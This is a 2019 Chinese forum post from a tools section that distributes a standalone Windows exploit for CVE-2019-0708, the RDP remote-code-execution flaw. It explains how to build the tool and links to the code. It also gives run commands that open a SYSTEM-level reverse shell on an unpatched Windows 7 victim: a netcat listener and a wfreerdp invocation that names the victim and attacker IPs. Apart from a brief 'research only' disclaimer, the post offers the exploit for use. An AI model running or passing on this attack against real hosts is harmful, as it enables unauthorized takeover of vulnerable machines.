请选择 进入手机版 | 继续访问电脑版
查看: 1147|回复: 0

[工具专区] CVE-2019-0708-EXP-Windows-Version

[复制链接]
  • TA的每日心情

    3 天前
  • 签到天数: 790 天

    [LV.10]以坛为家III

    发表于 2019-9-26 17:08:09 | 显示全部楼层 |阅读模式
    作者poc仅供研究目的,如果读者利用本poc从事其他行为,与本人无关

    CVE-2019-0708-EXP-WIndows版独立exe运行,无需linux,python,ruby等,运行后直接反弹System权限Shell

    复现环境
    被攻击者操作系统Victim:Windows 7 sp1 x64位操作系统
    攻击者操作系统Attacker:Windows 10 x64位操作系统
    编译环境Visual Studio 2013
    使用说明
    进入CVE-2019-0708-EXP-Release目录
    运行nc.exe -lvp 7788
    运行wfreerdp.exe /v:Victim_IP /l:Attacker_IP,如wfreerdp.exe /v:10.120.1.160 /l:10.120.1.17
    安装教程
    复制FreeRDP-master项目至E:\git\KernelResearch\FreeRDP-master\
    解压openssl.7z至C:\openssl\
    以管理员身份安装nasm-2.14.02-installer-x64.exe
    添加C:\Program Files\NASM至path环境变量
    以管理员身份安装cmake-3.15.3-win64-x64.msi
    添加C:\Program Files\CMake\bin至path环境变量
    重启计算机
    解压nasmBuildCustomizations.rar其中3个文件至C:\Program Files (x86)\MSBuild\Microsoft.Cpp\v4.0\V120\BuildCustomizations\
    client->common->freerdp-client工程目录右击->"工程依赖项"->"生成自定义",然后勾选nasm这一项
    运行"C:\Program Files\CMake\bin\cmake.exe" E:\git\KernelResearch\FreeRDP-master\CMakeCache.txt
    编译项目,如果发现仍然缺少文件,可以从FreeRDP-master-restore.7z还原

    运行效果:



    下载地址:https://gitee.com/cbwang505/CVE-2019-0708-EXP-WIndows

    本帖子中包含更多资源

    您需要 登录 才可以下载或查看,没有帐号?注册

    x
    回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    快速回复 返回顶部 返回列表